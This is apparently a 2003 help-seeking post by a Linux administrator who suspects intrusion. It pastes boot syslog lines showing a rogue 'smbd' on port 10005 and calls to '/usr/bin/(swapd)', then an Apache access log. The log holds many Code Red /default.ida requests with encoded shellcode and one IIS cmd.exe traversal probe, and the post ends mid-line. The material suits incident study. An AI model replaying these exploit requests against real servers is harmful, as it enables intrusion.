Jun 27 13:17:47 localhost smbd -D[211]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: isapnp: Scanning for PnP cards...
Jun 27 13:17:47 localhost smbd -D[211]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:39 localhost kernel: isapnp: Card '3Com 3C509B EtherLink III'
Jun 27 13:18:39 localhost 6¿ù 27 13:17:48 kudzu: Updating /etc/fstab
succeeded
Jun 27 13:18:39 localhost kernel: isapnp: 1 Plug & Play card detected total
Jun 27 13:18:39 localhost 6¿ù 27 13:18:00 kudzu: succeeded
Jun 27 13:18:39 localhost kernel: Linux NET4.0 for Linux 2.4
Jun 27 13:18:01 localhost smbd -D[240]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: Based upon Swansea University Computer
Society NET3.039
Jun 27 13:18:01 localhost smbd -D[240]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:39 localhost kernel: Initializing RT netlink socket
Jun 27 13:18:01 localhost smbd -D[261]: error: bind: Address already in use
Jun 27 13:18:39 localhost smbd -D[699]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: apm: BIOS version 1.2 Flags 0x07 (Driver
version 1.14)
Jun 27 13:18:01 localhost smbd -D[261]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:39 localhost smbd -D[699]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:39 localhost kernel: Starting kswapd v1.8
Jun 27 13:18:40 localhost 6¿ù 27 13:18:01 sysctl: net.ipv4.ip_forward = 0
Jun 27 13:18:39 localhost kernel: pty: 256 Unix98 ptys configured
Jun 27 13:18:40 localhost 6¿ù 27 13:18:01 sysctl:
net.ipv4.conf.all.rp_filter = 1
Jun 27 13:18:39 localhost kernel: block: queued sectors max/low
126077kB/42025kB, 384 slots per queue
Jun 27 13:18:40 localhost 6¿ù 27 13:18:01 sysctl: kernel.sysrq = 0
Jun 27 13:18:39 localhost kernel: RAMDISK driver initialized: 16 RAM disks
of 4096K size 1024 blocksize
Jun 27 13:18:40 localhost 6¿ù 27 13:18:01 network: Setting network
parameters: succeeded
Jun 27 13:18:39 localhost kernel: Uniform Multi-Platform E-IDE driver
Revision: 6.31
Jun 27 13:18:02 localhost smbd -D[286]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: ide: Assuming 33MHz system bus speed for
PIO modes; override with idebus=xx
Jun 27 13:18:02 localhost smbd -D[286]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:40 localhost kernel: PIIX4: IDE controller on PCI bus 00 dev 09
Jun 27 13:18:40 localhost 6¿ù 27 13:18:02 ifup: sh: /usr/bin/(swapd): ±×·±
ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:18:40 localhost kernel: PIIX4: chipset revision 1
Jun 27 13:18:40 localhost 6¿ù 27 13:18:40 netfs: Mounting other
filesystems: succeeded
Jun 27 13:18:03 localhost smbd -D[354]: error: bind: Address already in use
Jun 27 13:18:40 localhost kernel: PIIX4: not 100%% native mode: will probe
irqs later
Jun 27 13:18:03 localhost smbd -D[354]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:40 localhost kernel: ide0: BM-DMA at 0xf000-0xf007, BIOS
settings: hda:pio, hdb:pio
Jun 27 13:18:40 localhost 6¿ù 27 13:18:03 ifup: sh: /usr/bin/(swapd): ±×·±
ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:18:40 localhost kernel: ide1: BM-DMA at 0xf008-0xf00f, BIOS
settings: hdc:pio, hdd:pio
Jun 27 13:18:40 localhost 6¿ù 27 13:18:03 network: Bringing up interface
lo: succeeded
Jun 27 13:18:40 localhost kernel: hda: QUANTUM FIREBALL_TM2100A, ATA DISK
drive
Jun 27 13:18:04 localhost smbd -D[377]: error: bind: Address already in use
Jun 27 13:18:40 localhost kernel: hdd: CRD-8160B, ATAPI CD/DVD-ROM drive
Jun 27 13:18:04 localhost smbd -D[377]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:40 localhost kernel: ide0 at 0x1f0-0x1f7,0x3f6 on irq 14
Jun 27 13:18:41 localhost 6¿ù 27 13:18:04 ifup: sh: /usr/bin/(swapd): ±×·±
ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:18:40 localhost kernel: ide1 at 0x170-0x177,0x376 on irq 15
Jun 27 13:18:41 localhost 6¿ù 27 13:18:04 ifup: Determining IP information
for eth0...
Jun 27 13:18:40 localhost smbd -D[734]: error: bind: Address already in use
Jun 27 13:18:40 localhost kernel: hda: 4124736 sectors (2112 MB) w/76KiB
Cache, CHS=1023/64/63, DMA
Jun 27 13:18:04 localhost pumpd[405]: starting at (uptime 0 days, 0:00:38)
Fri Jun 27 13:18:04 2003
Jun 27 13:18:40 localhost smbd -D[734]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:40 localhost kernel: Partition check:
Jun 27 13:18:41 localhost kernel: hda: hda1 hda2 hda3
Jun 27 13:18:41 localhost kernel: Floppy drive(s): fd0 is 1.44M
Jun 27 13:18:41 localhost kernel: FDC 0 is a post-1991 82077
Jun 27 13:18:41 localhost apmd[740]: Version 3.0final (APM BIOS 1.2, Linux
driver 1.14)
Jun 27 13:18:41 localhost 6¿ù 27 13:18:41 apmd: apmd startup succeeded
Jun 27 13:18:41 localhost kernel: Serial driver version 5.02 (2000-08-09)
with MANY_PORTS MULTIPORT SHARE_IRQ SERIAL_PCI ISAPNP enabled
Jun 27 13:18:41 localhost kernel: ttyS00 at 0x03f8 (irq = 4) is a 16550A
Jun 27 13:18:41 localhost kernel: ttyS01 at 0x02f8 (irq = 3) is a 16550A
Jun 27 13:18:41 localhost kernel: Real Time Clock Driver v1.10d
Jun 27 13:18:41 localhost kernel: md driver 0.90.0 MAX_MD_DEVS=256,
MD_SB_DISKS=27
Jun 27 13:18:41 localhost kernel: md.c: sizeof(mdp_super_t) = 4096
Jun 27 13:18:41 localhost kernel: autodetecting RAID arrays
Jun 27 13:18:41 localhost kernel: autorun ...
Jun 27 13:18:41 localhost kernel: ... autorun DONE.
Jun 27 13:18:06 localhost pumpd[405]: configured interface eth0
Jun 27 13:18:42 localhost 6¿ù 27 13:18:10 ifup: done.
Jun 27 13:18:11 localhost smbd -D[441]: error: bind: Address already in use
Jun 27 13:18:11 localhost smbd -D[441]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:42 localhost 6¿ù 27 13:18:11 ifup: sh: /usr/bin/(swapd): ±×·±
ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:18:42 localhost 6¿ù 27 13:18:11 network: Bringing up interface
eth0: succeeded
Jun 27 13:18:11 localhost smbd -D[468]: error: bind: Address already in use
Jun 27 13:18:11 localhost smbd -D[468]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:42 localhost 6¿ù 27 13:18:12 ifup: sh: /usr/bin/(swapd): ±×·±
ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:18:13 localhost smbd -D[540]: error: bind: Address already in use
Jun 27 13:18:13 localhost smbd -D[540]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:42 localhost 6¿ù 27 13:18:13 ifup: sh: /usr/bin/(swapd): ±×·±
ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:18:42 localhost 6¿ù 27 13:18:33 network: Bringing up interface
eth1: succeeded
Jun 27 13:18:41 localhost kernel: NET4: Linux TCP/IP 1.0 for NET4.0
Jun 27 13:18:34 localhost smbd -D[574]: error: bind: Address already in use
Jun 27 13:18:42 localhost kernel: IP Protocols: ICMP, UDP, TCP, IGMP
Jun 27 13:18:34 localhost smbd -D[574]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:42 localhost kernel: IP: routing cache hash table of 2048
buckets, 16Kbytes
Jun 27 13:18:42 localhost smbd -D[756]: error: bind: Address already in use
Jun 27 13:18:42 localhost apmd[740]: Charge: * * * (-1% unknown)
Jun 27 13:18:42 localhost kernel: TCP: Hash tables configured (established
16384 bind 16384)
Jun 27 13:18:42 localhost smbd -D[756]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:42 localhost kernel: Linux IP multicast router 0.06 plus PIM-SM
Jun 27 13:18:42 localhost kernel: NET4: Unix domain sockets 1.0/SMP for
Linux NET4.0.
Jun 27 13:18:42 localhost kernel: VFS: Mounted root (ext2 filesystem)
readonly.
Jun 27 13:18:42 localhost kernel: Freeing unused kernel memory: 528k freed
Jun 27 13:18:42 localhost kernel: Adding Swap: 32248k swap-space
(priority -1)
Jun 27 13:18:42 localhost kernel: Winbond Super-IO detection, now testing
ports 3F0,370,250,4E,2E ...
Jun 27 13:18:42 localhost kernel: Winbond chip at EFER=0x3f0 key=0x87
devid=fc devrev=3c oldid=8a
Jun 27 13:18:42 localhost kernel: Winbond chip type 83877F
Jun 27 13:18:42 localhost kernel: SMSC Super-IO detection, now testing Ports
2F0, 370 ...
Jun 27 13:18:43 localhost kernel: 0x378: FIFO is 16 bytes
Jun 27 13:18:43 localhost kernel: 0x378: writeIntrThreshold is 16
Jun 27 13:18:43 localhost kernel: 0x378: readIntrThreshold is 16
Jun 27 13:18:43 localhost kernel: parport0: PC-style at 0x378 (0x778)
[PCSPP,TRISTATE,COMPAT,EPP,ECP]
Jun 27 13:18:43 localhost kernel: parport0: irq 7 detected
Jun 27 13:18:43 localhost kernel: 8139too Fast Ethernet driver 0.9.15 loaded
Jun 27 13:18:43 localhost kernel: PCI: Found IRQ 11 for device 00:0a.0
Jun 27 13:18:43 localhost kernel: eth0: RealTek RTL8139 Fast Ethernet at
0xcc80b000, 00:a0:b0:0f:01:d7, IRQ 11
Jun 27 13:18:43 localhost kernel: eth0: Setting half-duplex based on
auto-negotiated partner ability 0000.
Jun 27 13:18:43 localhost kernel: eth0: Setting half-duplex based on
auto-negotiated partner ability 0000.
Jun 27 13:18:43 localhost kernel: eth1: 3c509 at 0x220, 10baseT port,
address 00 a0 24 ee 4a c7, IRQ 5.
Jun 27 13:18:43 localhost kernel: 3c509.c:1.16 (2.2) 2/3/98
becker@cesdis.gsfc.nasa.gov.
Jun 27 13:18:43 localhost kernel: eth1: Setting Rx mode to 1 addresses.
Jun 27 13:18:43 localhost automount[796]: starting automounter version
3.1.7, path = /misc, maptype = file, mapname = /etc/auto.misc
Jun 27 13:18:43 localhost 6¿ù 27 13:18:43 autofs: autofs startup succeeded
Jun 27 13:18:44 localhost smbd -D[810]: error: bind: Address already in use
Jun 27 13:18:44 localhost smbd -D[810]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:44 localhost automount[796]: using kernel protocol version 3
Jun 27 13:18:45 localhost 6¿ù 27 13:18:45 snort: Initializing daemon mode
Jun 27 13:18:45 localhost kernel: eth0: Promiscuous mode enabled.
Jun 27 13:18:45 localhost kernel: device eth0 entered promiscuous mode
Jun 27 13:18:45 localhost 6¿ù 27 13:18:45 snortd: snort startup succeeded
Jun 27 13:18:45 localhost snort: ERROR /etc/snort/webcgi-lib:3 => Port value
missing in rule!
Jun 27 13:18:45 localhost kernel: device eth0 left promiscuous mode
Jun 27 13:18:46 localhost smbd -D[832]: error: bind: Address already in use
Jun 27 13:18:46 localhost smbd -D[832]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 sshd: Starting sshd:
Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 sshd: sh: /usr/bin/(swapd): ±×·±
ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 sshd: succeeded
Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 sshd:
Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 rc: Starting sshd: succeeded
Jun 27 13:18:47 localhost smbd -D[851]: error: bind: Address already in use
Jun 27 13:18:47 localhost smbd -D[851]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:47 localhost smbd -D[865]: error: bind: Address already in use
Jun 27 13:18:47 localhost smbd -D[865]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:50 localhost login(pam_unix)[878]: authentication failure;
logname=LOGIN uid=0 euid=0 tty=tty1 ruser= rhost= user=root
Jun 27 13:18:53 localhost login[878]: FAILED LOGIN 1 FROM (null) FOR root,
Authentication failure
Jun 27 13:18:56 localhost login(pam_unix)[878]: session opened for user root
by LOGIN(uid=0)
Jun 27 13:18:56 localhost -- root[878]: ROOT LOGIN ON tty1
Jun 27 13:18:58 localhost smbd -D[921]: error: bind: Address already in use
Jun 27 13:18:58 localhost smbd -D[921]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:19:01 localhost smbd -D[966]: error: bind: Address already in use
Jun 27 13:19:01 localhost smbd -D[966]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:22:40 localhost smbd -D[21]: log: Received signal 15; terminating.
Jun 27 13:26:00 localhost smbd -D[1112]: log: Server listening on port
10005.
Jun 27 13:26:00 localhost smbd -D[1112]: log: Generating 768 bit RSA key.
Jun 27 13:26:01 localhost kernel: eth1: Setting Rx mode to 0 addresses.
Jun 27 13:26:01 localhost kernel: eth1: Setting Rx mode to 1 addresses.
Jun 27 13:26:02 localhost smbd -D[1213]: error: bind: Address already in use
Jun 27 13:26:02 localhost smbd -D[1213]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:26:03 localhost smbd -D[1112]: log: RSA key generation complete.
Jun 27 13:26:10 localhost smbd -D[1234]: error: bind: Address already in use
Jun 27 13:26:10 localhost smbd -D[1234]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:26:11 localhost pumpd[1272]: starting at (uptime 0 days, 0:08:45)
Fri Jun 27 13:26:11 2003
Jun 27 13:26:11 localhost kernel: eth0: Setting half-duplex based on
auto-negotiated partner ability 0000.
Jun 27 13:26:13 localhost kernel: eth0: Setting half-duplex based on
auto-negotiated partner ability 0000.
Jun 27 13:26:13 localhost pumpd[1272]: configured interface eth0
Jun 27 13:26:14 localhost smbd -D[1322]: error: bind: Address already in use
Jun 27 13:26:14 localhost smbd -D[1322]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:26:30 localhost kernel: ip_tables: (c)2000 Netfilter core team
Jun 27 13:26:30 localhost kernel: ip_conntrack (1536 buckets, 12288 max)
Jun 27 13:26:40 localhost smbd -D[1112]: log: Received signal 15;
terminating.



I didn't run smbd, which keeps trying to open port 10005...
I guess this smbd is the tool of hacking..

Also I found somethings strange in the /var/log/httpd/accesslog


218.236.111.207 - - [27/Jun/2003:03:32:20 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"

Here This is strange. "GET /deafault.ida" looks likes hacking, doesn't it??

218.236.61.59 - - [27/Jun/2003:03:35:45 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"

I have found several things like this..

218.147.95.14 - - [27/Jun/2003:04:01:07 +0900] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"
218.50.170.120 - - [27/Jun/2003:04:15:02 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.111.207 - - [27/Jun/2003:04:36:42 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.76.71 - - [27/Jun/2003:04:46:42 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.64.85.21 - - [27/Jun/2003:04:50:28 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.128.18 - - [27/Jun/2003:04:57:48 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.128.18 - - [27/Jun/2003:04:59:26 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.111.207 - - [27/Jun/2003:04:59:35 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.128.18 - - [27/Jun/2003:05:01:10 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
64.51.96.194 - - [27/Jun/2003:05:08:28 +0900] "HEAD / HTTP/1.0" 200 0 "-"
"Mozilla/3.0 (compatible)"
218.236.111.207 - - [27/Jun/2003:05:35:47 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.76.71 - - [27/Jun/2003:05:46:29 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.111.207 - - [27/Jun/2003:06:08:27 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.111.207 - - [27/Jun/2003:06:11:54 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
194.226.48.12 - - [27/Jun/2003:06:52:58 +0900] "HEAD / HTTP/1.0" 200 0 "-"
"./prob"
218.236.235.252 - - [27/Jun/2003:06:54:51 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.111.207 - - [27/Jun/2003:07:19:36 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.111.207 - - [27/Jun/2003:07:30:45 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.204.221 - - [27/Jun/2003:07:31:02 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.204.221 - - [27/Jun/2003:08:00:40 +0900] "GET
